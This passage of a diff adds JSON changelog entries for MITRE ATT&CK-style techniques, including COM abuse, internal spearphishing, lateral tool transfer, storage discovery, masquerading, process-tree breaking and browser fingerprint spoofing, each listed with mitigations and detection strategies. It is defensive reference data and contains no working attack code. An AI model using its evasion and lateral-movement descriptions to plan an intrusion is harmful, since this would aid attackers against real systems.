+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0480: Detection of Credential Harvesting via Web Portal Modification"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-12 14:08:48.689000+00:00",
+                    "modified": "2026-05-12 15:12:00.707000+00:00",
+                    "name": "Inter-Process Communication",
+                    "description": "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. \n\nAdversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Linux environments support several different IPC mechanisms, two of which being sockets and pipes.(Citation: Linux IPC) Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1559",
+                            "external_id": "T1559"
+                        },
+                        {
+                            "source_name": "Fireeye Hunting COM June 2019",
+                            "description": "Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html"
+                        },
+                        {
+                            "source_name": "Linux IPC",
+                            "description": "N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved March 11, 2022.",
+                            "url": "https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them."
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.707000+00:00\", \"old_value\": \"2025-10-24 17:49:13.194000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1013: Application Developer Guidance",
+                            "M1026: Privileged Account Management",
+                            "M1040: Behavior Prevention on Endpoint",
+                            "M1042: Disable or Remove Feature or Program",
+                            "M1048: Application Isolation and Sandboxing",
+                            "M1054: Software Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0493: Detect Abuse of Inter-Process Communication (T1559)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-12 14:09:53.107000+00:00",
+                    "modified": "2026-05-12 15:12:00.624000+00:00",
+                    "name": "Component Object Model",
+                    "description": "Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)\n\nVarious COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1559/001",
+                            "external_id": "T1559.001"
+                        },
+                        {
+                            "source_name": "ProjectZero File Write EoP Apr 2018",
+                            "description": "Forshaw, J. (2018, April 18). Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege. Retrieved May 3, 2018.",
+                            "url": "https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html"
+                        },
+                        {
+                            "source_name": "Fireeye Hunting COM June 2019",
+                            "description": "Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html"
+                        },
+                        {
+                            "source_name": "Microsoft COM",
+                            "description": "Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017.",
+                            "url": "https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx"
+                        },
+                        {
+                            "source_name": "Enigma MMC20 COM Jan 2017",
+                            "description": "Nelson, M. (2017, January 5). Lateral Movement using the MMC20 Application COM Object. Retrieved November 21, 2017.",
+                            "url": "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/"
+                        },
+                        {
+                            "source_name": "Enigma Outlook DCOM Lateral Movement Nov 2017",
+                            "description": "Nelson, M. (2017, November 16). Lateral Movement using Outlook's CreateObject Method and DotNetToJScript. Retrieved November 21, 2017.",
+                            "url": "https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.624000+00:00\", \"old_value\": \"2025-10-24 17:48:35.814000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1048: Application Isolation and Sandboxing"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0224: Detect Abuse of Component Object Model (T1559.001)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-09-04 19:26:12.441000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Internal Spearphishing",
+                    "description": "After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1684/001).(Citation: Trend Micro - Int SP)\n\nFor example, adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic login interfaces.\n\nAdversaries may also leverage internal chat apps, such as Microsoft Teams, to spread malicious content or engage users in attempts to capture sensitive information and/or credentials.(Citation: Int SP - chat apps)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "lateral-movement"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1534",
+                            "external_id": "T1534"
+                        },
+                        {
+                            "source_name": "Int SP - chat apps",
+                            "description": "Microsoft Threat Intelligence. (2023, August 2). Midnight Blizzard conducts targeted social engineering over Microsoft Teams. Retrieved February 16, 2024.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2023/08/02/midnight-blizzard-conducts-targeted-social-engineering-over-microsoft-teams/"
+                        },
+                        {
+                            "source_name": "Trend Micro - Int SP",
+                            "description": "Trend Micro. (n.d.). Retrieved February 16, 2024.",
+                            "url": "https://www.trendmicro.com/en_us/research.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Tim MalcomVetter",
+                        "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2026-04-17 14:23:56.376000+00:00\"}}}",
+                    "previous_version": "1.4",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0054: Internal Spearphishing via Trusted Accounts"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-11 21:01:00.959000+00:00",
+                    "modified": "2026-05-12 15:12:00.713000+00:00",
+                    "name": "Lateral Tool Transfer",
+                    "description": "Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation.\n\nAdversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001).(Citation: Unit42 LockerGoga 2019)\n\nFiles can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://attack.mitre.org/software/S0095). In some cases, adversaries may be able to leverage [Web Service](https://attack.mitre.org/techniques/T1102)s such as Dropbox or OneDrive to copy files from one machine to another via shared, automatically synced folders.(Citation: Dropbox Malware Sync)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "lateral-movement"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1570",
+                            "external_id": "T1570"
+                        },
+                        {
+                            "source_name": "Dropbox Malware Sync",
+                            "description": "David Talbot. (2013, August 21). Dropbox and Similar Services Can Sync Malware. Retrieved May 31, 2023.",
+                            "url": "https://www.technologyreview.com/2013/08/21/83143/dropbox-and-similar-services-can-sync-malware/"
+                        },
+                        {
+                            "source_name": "Unit42 LockerGoga 2019",
+                            "description": "Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.",
+                            "url": "https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Shailesh Tiwary (Indian Army)"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.713000+00:00\", \"old_value\": \"2025-10-24 17:49:19.137000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1031: Network Intrusion Prevention",
+                            "M1037: Filter Network Traffic"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0183: Detection Strategy for Lateral Tool Transfer across OS platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--f2514ae4-4e9b-4f26-a5ba-c4ae85fe93c3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-09-25 21:09:38.677000+00:00",
+                    "modified": "2026-05-12 15:12:00.724000+00:00",
+                    "name": "Local Storage Discovery",
+                    "description": "Adversaries may enumerate local drives, disks, and/or volumes and their attributes like total or free space and volume serial number. This can be done to prepare for ransomware-related encryption, to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0109), or as a precursor to [Direct Volume Access](https://attack.mitre.org/techniques/T1006). \n\nOn ESXi systems, adversaries may use [Hypervisor CLI](https://attack.mitre.org/techniques/T1059/012) commands such as `esxcli` to list storage connected to the host as well as `.vmdk` files.(Citation: TrendMicro)(Citation: TrendMicro ESXI Ransomware)\n\nOn Windows systems, adversaries can use `wmic logicaldisk get` to find information about local network drives. They can also use `Get-PSDrive` in PowerShell to retrieve drives and may additionally use Windows API functions such as `GetDriveType`.(Citation: Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024)(Citation: Volexity)\n\nLinux has commands such as `parted`, `lsblk`, `fdisk`, `lshw`, and `df` that can list information about disk partitions such as size, type, file system types, and free space. The command `diskutil` on MacOS can be used to list disks while `system_profiler SPStorageDataType` can additionally show information such as a volume\u2019s mount path, file system, and the type of drive in the system. \n\nInfrastructure as a Service (IaaS) cloud providers also have commands for storage discovery such as `describe volume` in AWS, `gcloud compute disks list` in GCP, and `az disk list` in Azure.(Citation: AWS docs describe volumes)(Citation: GCP gcloud compute disks list)(Citation: azure az disk)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1680",
+                            "external_id": "T1680"
+                        },
+                        {
+                            "source_name": "Volexity",
+                            "description": "Ankur Saini, Charlie Gardner. (2023, June 28). Charming Kitten Updates POWERSTAR with an InterPlanetary Twist. Retrieved September 25, 2025.",
+                            "url": "https://www.volexity.com/blog/2023/06/28/charming-kitten-updates-powerstar-with-an-interplanetary-twist/"
+                        },
+                        {
+                            "source_name": "AWS docs describe volumes",
+                            "description": "AWS. (n.d.). describe-volumes. Retrieved October 20, 2025.",
+                            "url": "https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-volumes.html"
+                        },
+                        {
+                            "source_name": "azure az disk",
+                            "description": "Azure. (n.d.). az disk. Retrieved October 20, 2025.",
+                            "url": "https://learn.microsoft.com/en-us/cli/azure/disk?view=azure-cli-latest"
+                        },
+                        {
+                            "source_name": "GCP gcloud compute disks list",
+                            "description": "Google Cloud. (n.d.). gcloud compute disks list. Retrieved October 20, 2025.",
+                            "url": "https://cloud.google.com/sdk/gcloud/reference/compute/disks/list"
+                        },
+                        {
+                            "source_name": "TrendMicro ESXI Ransomware",
+                            "description": "Junestherry Dela Cruz. (2022, January 24). Analysis and Impact of LockBit Ransomware\u2019s First Linux and VMware ESXi Variant. Retrieved March 26, 2025.",
+                            "url": "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html"
+                        },
+                        {
+                            "source_name": "Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024",
+                            "description": "Lenart Bermejo, Sunny Lu, Ted Lee. (2024, September 9). Earth Preta Evolves its Attacks with New Malware and Strategies. Retrieved August 4, 2025.",
+                            "url": "https://www.trendmicro.com/en_us/research/24/i/earth-preta-new-malware-and-strategies.html"
+                        },
+                        {
+                            "source_name": "TrendMicro",
+                            "description": "Mina Naiim. (2021, May 28). DarkSide on Linux: Virtual Machines Targeted. Retrieved March 26, 2025.",
+                            "url": "https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Liran Ravich, CardinalOps"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.724000+00:00\", \"old_value\": \"2025-10-22 02:09:54.940000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0188: Local Storage Discovery via Drive Enumeration and Filesystem Probing"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:38.511000+00:00",
+                    "modified": "2026-05-12 15:12:00.629000+00:00",
+                    "name": "Masquerading",
+                    "description": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\n\nRenaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1036",
+                            "external_id": "T1036"
+                        },
+                        {
+                            "source_name": "LOLBAS Main Site",
+                            "description": "LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020.",
+                            "url": "https://lolbas-project.github.io/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Bartosz Jerzman",
+                        "David Lu, Tripwire",
+                        "Elastic",
+                        "Felipe Esp\u00f3sito, @Pr0teus",
+                        "Menachem Goldstein",
+                        "Nick Carr, Mandiant",
+                        "Oleg Kolesnikov, Securonix"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.629000+00:00\", \"old_value\": \"2026-04-15 20:32:00.311000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1018: User Account Management",
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1038: Execution Prevention",
+                            "M1040: Behavior Prevention on Endpoint",
+                            "M1045: Code Signing",
+                            "M1047: Audit",
+                            "M1049: Antivirus/Antimalware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0127: Behavioral Detection of Masquerading Across Platforms via Metadata and Execution Discrepancy"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--34a80bc4-80f2-46e6-94ff-f3265a4b657c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-27 19:49:40.815000+00:00",
+                    "modified": "2026-05-12 15:12:00.625000+00:00",
+                    "name": "Break Process Trees",
+                    "description": "An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the \u201cparent-child\" relationship for detection, breaking this relationship could result in the adversary\u2019s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs.(Citation: 3OHA double-fork 2022) \n\nOn Linux systems, adversaries may execute a series of [Native API](https://attack.mitre.org/techniques/T1106) calls to alter malware's process tree. For example, adversaries can execute their payload without any arguments, call the `fork()` API call twice, then have the parent process exit. This creates a grandchild process with no parent process that is immediately adopted by the `init` system process (PID 1), which successfully disconnects the execution of the adversary's payload from its previous process tree.\n\nAnother example is using the \u201cdaemon\u201d syscall to detach from the current parent process and run in the background.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1036/009",
+                            "external_id": "T1036.009"
+                        },
+                        {
+                            "source_name": "3OHA double-fork 2022",
+                            "description": "Juan Tapiador. (2022, April 11). UNIX daemonization and the double fork. Retrieved September 29, 2023.",
+                            "url": "https://0xjet.github.io/3OHA/2022/04/11/post.html"
+                        },
+                        {
+                            "source_name": "Microsoft XorDdos Linux Stealth 2022",
+                            "description": "Microsoft Threat Intelligence. (2022, May 19). Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices. Retrieved September 27, 2023.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/"
+                        },
+                        {
+                            "source_name": "Sandfly BPFDoor 2022",
+                            "description": "The Sandfly Security Team. (2022, May 11). BPFDoor - An Evasive Linux Backdoor Technical Analysis. Retrieved September 29, 2023.",
+                            "url": "https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Tim (Wadhwa-)Brown"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.625000+00:00\", \"old_value\": \"2026-04-15 20:32:49.027000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0443: Detection Strategy for Masquerading via Breaking Process Trees"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--afac5dbc-4383-4fb6-9ba6-45b25d49e530",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-09-22 20:13:45.616000+00:00",
+                    "modified": "2026-05-12 15:12:00.707000+00:00",
+                    "name": "Browser Fingerprint",
+                    "description": "Adversaries may attempt to blend in with legitimate traffic by spoofing browser and system attributes like operating system, system language, platform, user-agent string, resolution, time zone, etc.  The HTTP\u00a0User-Agent\u00a0request header\u00a0is a string that lets servers and network peers identify the application, operating system, vendor, and/or version of the requesting\u00a0user agent.(Citation: Mozilla User Agent)\n\nAdversaries may gather this information through [System Information Discovery](https://attack.mitre.org/techniques/T1082) or by users navigating to adversary-controlled websites, and then use that information to craft their web traffic to evade defenses.(Citation: Gummy Browsers Targeted Browser Spoofing against State-of-the-Art Fingerprinting Techniques)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1036/012",
+                            "external_id": "T1036.012"
+                        },
+                        {
+                            "source_name": "Mozilla User Agent",
+                            "description": "MDN contributors. (2025, July 4). User-Agent header. Retrieved October 19, 2025.",
+                            "url": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/User-Agent"
+                        },
+                        {
+                            "source_name": "Gummy Browsers Targeted Browser Spoofing against State-of-the-Art Fingerprinting Techniques",
+                            "description": "Zengrui Liu, Prakash Shrestha, and Nitesh Saxena. (2021, October 19). Retrieved April 15, 2026.",
+                            "url": "https://arxiv.org/pdf/2110.10129"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
